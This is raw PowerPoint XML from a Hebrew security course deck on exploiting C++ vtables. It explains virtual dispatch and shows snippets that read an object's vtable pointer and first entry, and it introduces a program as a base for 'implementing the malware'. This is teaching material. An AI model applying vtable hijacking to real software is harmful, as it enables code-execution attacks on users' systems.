            <a:pPr lvl="1" algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>השוני הוא כאשר אנו דורסים פונ' של האב במימוש מחלקת הבן.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>כאשר נתייחס לאובייקט מסוג מחלקת בן כאילו הוא אובייקט מסוג מחלקת האב, קריאה לפונ' ווירטואלית תבצע את פעולת הפונ' הווירטואלית הדורסת של הבן.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>כאשר נתייחס לאובייקט מסוג מחלקת בן כאילו הוא אובייקט מסוג מחלקת האב, קריאה לפונ' סטנדרטית תבצע את פעולת הפונ' ההסטנדרטית המקורית של האב, למרות שנדרסה במימוש מחלקת הבן.</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>בכדי לטפל בשיטת עבודה זו, קיימת לכל מחלקה טבלה ווירטואלית (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>vtable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>) אשר שומרת את הכתובות של הפונ' הווירטואליות במחלקה</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5324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Ex1.1 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Exploiting C++ VTABLES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פונקציות וזיכרון ווירטואלי בתוכנית </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>C++</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>משתנה המחלקה מספק לנו מצביע לנתוני המחלקה כמו שהזכרנו אשר כוללים גם את הטבלה הווירטואלית של המשתנה.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>לכן ניתנת לנו האפשרות לגשת לכתובתה של הטבלה הווירטואלית ע"י גישה לתא הראשון בכתובתו של המבציע הראשון במשתנה.</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>FooBar foobar;</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>long *foobarAsLong = (long *)&amp;foobar;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>printf("FooBar vtable pointer: %p\n", foobarAsLong[0]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>long **foobarVtable = (long **)&amp;foobar;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>printf("First entry of FooBar VTABLE: %p\n", foobarVtable[0][0]);</a:t>
            </a:r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843200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Ex1.1 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Exploiting C++ VTABLES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פונקציות וזיכרון ווירטואלי בתוכנית </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>C++</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>נוכל גם לגשת לערך הראשון בטבלה הווירטואלית ע"י גישה לתא ה </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[0][0]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t> במצביע הראשון של המצביע הראשון במשתנה המחלקה.</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>FooBar foobar;</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>long **foobarVtable = (long **)&amp;foobar;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>printf("First entry of FooBar VTABLE: %p\n", foobarVtable[0][0]);</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0" algn="r" rtl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>חשוב לציין שבמקרה של ירושה מרובה, העניינים מסתבכים במקצת אבל שומרים על אותו העיקרון.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="401419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Ex1.1 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Exploiting C++ VTABLES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פונקציות וזיכרון ווירטואלי בתוכנית </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>C++</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>לסיכום, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>כאשר אנו קוראים לשיטה וירטואלית, עלינו לחפש את הכתובת של השיטה ב- vtable של המחלקה. התהליך המל</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>א</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>קבל את הכתובת של vtable של המחלקה מן האובייקט עצמו.</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>קבל את הכתובת של השיטה הווירטואלית של המחלקה מה- vtable.</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>קריאה</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> לשיטה הוירטואלית בכתובת זו.</a:t>
            </a:r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1619907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Ex1.1 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Exploiting C++ VTABLES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יאללה לעבודה! לשם כך אנו נשתמש בתוכנית הבאה אשר מספקת תשתית טובה למימוש הנוזקה</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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57" y="2433880"/>
            <a:ext cx="4956985" cy="3878020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0576" y="5640738"/>
            <a:ext cx="3904766" cy="82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651565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2613</TotalTime>
  <Words>945</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>מסך רחב</PresentationFormat>
  <Paragraphs>111</Paragraphs>
  <Slides>17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ערכת נושא Office</vt:lpstr>
      <vt:lpstr>Advance subjects in cyber security</vt:lpstr>
      <vt:lpstr>Ex1.1 - Exploiting C++ VTABLES</vt:lpstr>
      <vt:lpstr>Ex1.1 - Exploiting C++ VTABLES</vt:lpstr>
      <vt:lpstr>Ex1.1 - Exploiting C++ VTABLES</vt:lpstr>
      <vt:lpstr>Ex1.1 - Exploiting C++ VTABLES</vt:lpstr>
      <vt:lpstr>Ex1.1 - Exploiting C++ VTABLES</vt:lpstr>
      <vt:lpstr>Ex1.1 - Exploiting C++ VTABLES</vt:lpstr>
      <vt:lpstr>Ex1.1 - Exploiting C++ VTABLES</vt:lpstr>
      <vt:lpstr>Ex1.1 - Exploiting C++ VTABLES</vt:lpstr>
      <vt:lpstr>Ex1.1 - Exploiting C++ VTABLES</vt:lpstr>
      <vt:lpstr>Ex1.1 - Exploiting C++ VTABLES</vt:lpstr>
      <vt:lpstr>Ex1.1 - Exploiting C++ VTABLES</vt:lpstr>
      <vt:lpstr>Ex1.1 - Exploiting C++ VTABLES</vt:lpstr>
      <vt:lpstr>Ex1.1 - Exploiting C++ VTABLES</vt:lpstr>
      <vt:lpstr>Ex1.1 - Exploiting C++ VTABLES</vt:lpstr>
      <vt:lpstr>Ex1.1 - Exploiting C++ VTABLES</vt:lpstr>
      <vt:lpstr>Ex1.1 - Exploiting C++ VTABLES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 subjects in cyber security</dc:title>
  <dc:creator>Oz</dc:creator>
  <cp:lastModifiedBy>Oz</cp:lastModifiedBy>
  <cp:revision>36</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-05-14T09:44:50Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-06-04T09:35:43Z</dcterms:modified>
</cp:coreProperties>
</file>